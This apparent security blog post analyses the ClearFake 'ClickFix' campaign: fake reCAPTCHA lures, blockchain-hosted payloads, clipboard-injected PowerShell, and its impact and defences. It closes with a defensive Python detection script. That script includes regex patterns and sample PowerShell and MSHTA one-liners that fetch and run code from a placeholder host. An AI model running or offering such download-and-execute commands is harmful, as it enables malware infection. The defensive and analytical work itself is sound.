
New ClearFake Variant "ClickFix" Uses Fake reCAPTCHA To Infect Victims


ClearFake is a malicious JavaScript framework first discovered in mid-2023 that targets unsuspecting users who visit compromised websites. Its primary goal is to infect victims with information-stealing malware such as Lumma Stealer, Vidar Stealer, and Emmenhtal Loader via social engineering tactics. By using fake error messages and fraudulent update prompts displayed in the browser, ClearFake exploits human behavior to bypass traditional security defenses.

A new variant of ClearFake emerged in late 2024, introducing a more convincing social engineering technique known as “ClickFix.” This updated version tricks users with fake reCAPTCHA or Cloudflare Turnstile verifications, ultimately leading them to run clipboard-injected PowerShell commands that download malware directly onto their systems. Notably, in addition to Emmenhtal and Lumma Stealer, ClearFake was observed distributing Vidar Stealer in January 2025.

In this article, we’ll examine the evolution of ClearFake and explore how the new variant leverages blockchain-based code delivery, encrypted lures hosted on Cloudflare Pages, and Web3 smart contract interactions. We’ll break down the infection chain, review the campaign’s real-world impact, and offer guidance on how to defend against this rapidly evolving threat.

What is Web3?

Web3 refers to the next evolution of the internet that leverages blockchain technology to create decentralized applications (dApps). Instead of relying on centralized servers, Web3 platforms use smart contracts on blockchains like Ethereum or Binance Smart Chain to store and execute code. In the context of ClearFake, attackers exploit Web3 features—such as smart contract Application Binary Interfaces (ABIs)—to host and retrieve malicious code in a way that's difficult for defenders to detect.

However, most mainstream browsers like Google Chrome, Firefox, Safari, and Edge do not come with built-in Web3 support. They can render dApps (decentralized apps) as normal websites, but they do not directly interact with blockchains or smart contracts out of the box. To use Web3 features, users typically rely on browser extensions such as MetaMask or Binance Wallet Extension.

New ClearFake, New Techniques

First discovered in mid-2023, ClearFake is a malicious JavaScript framework designed to deliver infostealer malware through compromised websites, fake update prompts, and cleverly crafted PowerShell lures. Its primary objective has consistently been to infect users with payloads like Lumma Stealer and Vidar Stealer by tricking them into executing malicious code themselves.

Since December 2024, researchers have observed a new ClearFake campaign using a new social engineering technique known as “ClickFix.” This technique relies on fake reCAPTCHA or Cloudflare Turnstile checks to coerce victims, and on a deeper integration with blockchain-based infrastructure to host malware payloads.

Here is a description of the ClickFix attack using the new variant of ClearFake:

  • JavaScript injected into compromised websites: Small loader scripts are inserted into compromised WordPress sites to initiate the infection chain. When a user visits the page, the injected JavaScript displays the "lure", a social engineering trick such as an error message, an update warning, or, in the new campaign, a human verification check.

  • Encrypting the ClickFix HTML code: The lure HTML is encrypted using AES-GCM and base64-encoded, making static detection more difficult. Because the payload is encrypted, malware scanners that look for malicious code in the browser do not see it in the clear.

  • Hosting payloads on Cloudflare Pages: The encrypted HTML code is stored on Cloudflare Pages, giving the malware delivery infrastructure a layer of legitimacy and reliability and making it more difficult to detect.

  • Abusing Binance Smart Chain (BSC) via Smart Contract ABIs: The loader uses Web3 calls in the browser to interact with smart contracts on BSC. The victim's browser fetches gzip-compressed and base64-encoded JavaScript, decrypts it with AES keys, and extracts the deceptive HTML code and malicious PowerShell commands. The JavaScript dynamically decrypts and injects the ClickFix HTML lure into a fullscreen iframe that obscures the original site and displays a reCAPTCHA or Cloudflare Turnstile human verification check.

  • Copied PowerShell command to clipboard: Once the lure is displayed, a malicious PowerShell command is silently copied to the user's clipboard.

  • Tricked users into executing the command: Instead of asking the user to click some images or otherwise assessing their behavior as a normal bot detection tool would, the ClickFix lure prompts the user to press a sequence of keys on their keyboard. These keystrokes are hotkeys designed to open a command prompt, paste in the contents of the clipboard, and execute them via PowerShell. This technique can even bypass endpoint protection mechanisms such as malware scanners, because the user manually runs the malicious PowerShell command themselves.

What's the Impact of ClearFake So Far?

In October 2024, the U.S. Department of Health and Human Services (HHS) Health Sector Cybersecurity Coordination Center (HC3) issued a detailed report for healthcare industry stakeholders about the risk posed by ClearFake. Here are some campaigns mentioned in the report:

  • March 2024: TA571 conducted phishing email campaigns targeting general users with HTML attachments mimicking Microsoft Word documents. These displayed fake error messages leading to ClickFix malware execution.

  • May 2024: ClearFake introduced the ClickFix tactic on compromised websites, displaying fake browser alerts that trick users into running PowerShell malware.

  • August 2024: ClickFix was used across a large malicious infrastructure hosting fake CAPTCHA pages, targeting users redirected from cracked software sites and fake Zoom/Google Meet pages. These lures simulated audio hardware errors to deceive users.

  • August 2024: A phishing campaign targeted the transport and logistics sector, redirecting victims to ClickFix lures distributing DanaBot malware.

  • September 2024: A phishing campaign targeted GitHub developers by creating fake issues warning of vulnerabilities, leading victims to download Lumma Stealer from fake CAPTCHA pages.

  • September 2024: Another ClickFix lure was discovered impersonating Facebook, displaying a fake browser issue.

By early 2025, ClearFake had infected over 9,300 websites, primarily targeting WordPress installations. In February 2025, security firm Arctic Wolf reported ClearFake infections on HEP2go, a popular video platform used by physical therapists. Visitors attempting to browse the site were redirected to fake CAPTCHA pages that initiated the malware chain. ClearFake is now being used to deliver a wide variety of commodity malware families, including Lumma Stealer, Vidar Stealer, Emmenhtal Loader, XWorm, AsyncRAT, NetSupport RAT, and VenomRAT. 

In the past couple of years, over 100 car dealership websites were indirectly compromised via a third-party video provider (LES Automotive), in what appears to be a supply chain attack delivering ClickFix lures and the SectopRAT malware. Threat actor TA571 has reportedly adopted similar techniques, distributing fake Microsoft Office error messages with embedded HTML lures that trigger the ClickFix infection chain.

How to Protect Yourself From ClickFix

To defend against ClickFix attacks, users should never follow instructions from suspicious websites or pop-ups to run PowerShell or MSHTA commands.

Organizations can reduce risk by disabling the Windows Run dialog (Win+R) via Group Policy, blocking MSHTA execution, and educating employees on social engineering tactics. Endpoint protection tools with behavior-based detection and clipboard monitoring can also help detect and block these threats before they execute.
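The behavior-based detection mentioned above can be approximated from ordinary process-creation telemetry. The ClickFix chain described in this article (Win+R, paste, Enter) shows up on the endpoint as explorer.exe spawning powershell.exe or mshta.exe with a one-liner that fetches remote content. The following Python script is an added example written for this article, not code from the article, from Packetlabs, or from any EDR vendor; it scores constructed Sysmon-style records against those traits. The record format, field names, and the placeholder host example.invalid are assumptions made up for the example.

```python
"""Score process-creation events for the ClickFix paste-and-run pattern.

Added, illustrative example (not the article's or any vendor's code). It
looks for the chain the article describes: an interactive parent
(explorer.exe, i.e. the Run dialog) launching PowerShell or MSHTA with a
command line that hides its window, executes in memory, or fetches a URL.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Interpreters the article names as the ClickFix execution vehicles.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe"}

# Parents that mean "a human typed/pasted this" (Run dialog, Start menu),
# as opposed to a script, scheduled task or management agent.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Traits of a clipboard-pasted one-liner: hidden window, encoded or
# in-memory execution, and a remote fetch. Each match adds one point.
SUSPICIOUS_FLAGS = [
    re.compile(r"(?i)\s-(w|win|windowstyle)\s+hidden"),
    re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    re.compile(r"(?i)\b(iex|invoke-expression)\b"),
    re.compile(r"(?i)\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloadfile)\b"),
    re.compile(r"(?i)https?://"),
]


def parse_event(line: str) -> ProcessEvent:
    """Parse a 'Key=Value|Key=Value' record (a constructed format for this example)."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    basename = lambda p: p.rsplit("\\", 1)[-1].lower()
    return ProcessEvent(
        parent_image=basename(fields["ParentImage"]),
        image=basename(fields["Image"]),
        command_line=fields["CommandLine"],
    )


def score_event(ev: ProcessEvent) -> int:
    """Return the number of ClickFix traits present (0 means not of interest)."""
    if ev.image not in LOLBINS:
        return 0
    score = 1 if ev.parent_image in INTERACTIVE_PARENTS else 0
    score += sum(1 for rx in SUSPICIOUS_FLAGS if rx.search(ev.command_line))
    return score


def find_clickfix(lines, threshold=2):
    """Return (line, score) pairs for events at or above the alert threshold."""
    hits = []
    for line in lines:
        s = score_event(parse_event(line))
        if s >= threshold:
            hits.append((line, s))
    return hits


# Constructed sample telemetry (not real captures); example.invalid is a
# placeholder for whatever host a lure would point at.
SAMPLE_LOG = [
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell -w hidden -c \"iex (irm http://example.invalid/p)\"",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\mshta.exe|CommandLine=mshta http://example.invalid/lure",
    "ParentImage=C:\\Windows\\System32\\cmd.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell -File C:\\scripts\\backup.ps1",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\notepad.exe|CommandLine=notepad.exe",
]

if __name__ == "__main__":
    for line, s in find_clickfix(SAMPLE_LOG):
        print(f"score={s}: {line}")
```

On the sample data the pasted PowerShell one-liner scores 5 and the MSHTA launch scores 2, while the scripted backup job and the benign notepad launch score 0. The threshold is deliberately low because a single explorer.exe-to-mshta.exe launch with a URL is already unusual for most users; tune it against your own baseline. On a real host the Run dialog also leaves an entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which corroborates the explorer.exe parent during incident response.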

Conclusion

The latest ClearFake variant demonstrates a dangerous evolution in social engineering and malware delivery, combining fake CAPTCHA lures with blockchain-hosted payloads. By tricking users into executing clipboard-injected PowerShell commands, the campaign spreads infostealers like Lumma and Vidar. As ClearFake continues to grow in scale and sophistication, awareness and strong endpoint protections are essential for defense.
